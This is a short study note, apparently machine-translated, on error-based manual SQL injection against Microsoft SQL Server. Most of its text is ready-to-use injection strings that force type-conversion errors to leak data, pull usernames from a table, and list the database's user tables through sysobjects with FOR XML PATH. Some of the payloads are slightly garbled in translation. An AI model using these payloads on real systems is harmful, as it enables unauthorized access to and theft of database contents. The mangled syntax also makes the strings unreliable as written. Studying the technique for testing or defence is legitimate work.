Learning with friends, speed is fast. Thank you for the treasure of youth.
Many on the internet in the long-winded MSSQL error manual injection, in fact, the principle is only a small section. As follows:
' and (query a piece of content) =1 and ' c ' = ' C
The nvarchar type, which queries the return of a piece of content, automatically converts the int type and will certainly fail to convert. The error then displays the value of the nvarchar type (the return of the query for a piece of content).
A single-field query is derived from this principle. As follows:
' and 0= (SELECT top 1 username from table) and ' c ' = ' C
Then there is a multi-field query derived from it. As follows:
' and 0= (SELECT top username from table for XML PATH (")) and ' c ' = ' C
Finally, according to the MSSQL built-in table features and functions, write the following:
' And 1= (select QuoteName (name) from database name: sysobjects where xtype= ' U ' for XML PATH (")) and ' c ' = ' C
If the SQL statement can not understand, please Baidu.
If there is a problem welcome correction.
Learning notes MSSQL Error manual injection